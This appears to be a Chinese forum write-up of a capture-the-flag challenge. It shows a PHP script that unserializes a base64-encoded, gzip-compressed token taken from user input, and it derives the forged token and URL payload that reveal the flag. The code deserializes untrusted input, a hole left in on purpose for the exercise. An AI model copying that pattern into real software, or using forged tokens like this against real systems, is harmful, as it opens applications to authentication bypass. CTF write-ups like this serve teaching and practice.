CTF-13解题思路

Track-子羽   ·   发表于 2021-11-17 12:03:35   ·   CTF&WP专版

源码分析:

  1. <?php
  2. $flag="flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}";
  3. session_start();
  4. $requset = array_merge($_GET, $_POST, $_SESSION,$_COOKIE);
  5. if(isset($requset['token'])){
  6. $login = unserialize(gzuncompress(base64_decode($requset['token'])));
  7. if($login['user'] === 'ichunqiu')
  8. {
  9. echo $flag;
  10. }
  11. }
  12. ?>

最终需要的条件是$login=array(‘user’=>’array’) 也就是
unserialize(gzuncompress(base64_decode($requset['token'])))==array('user'=>'ichunqiu')

->
gzuncompress(base64_decode($requset['token']))==serialize(array('user'=>'ichunqiu'))

->
base64_decode($requset['token'])==gzcompress(serialize(array('user'=>'ichunqiu'))

->
$requset['token']==base64_encode(gzcompress(serialize(array('user'=>'ichunqiu'))))

因此最终传参
eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==

payload:

?token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==

image-20210909203203845

打赏我,让我更有动力~

0 Reply   |  Until 7个月前 | 175 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.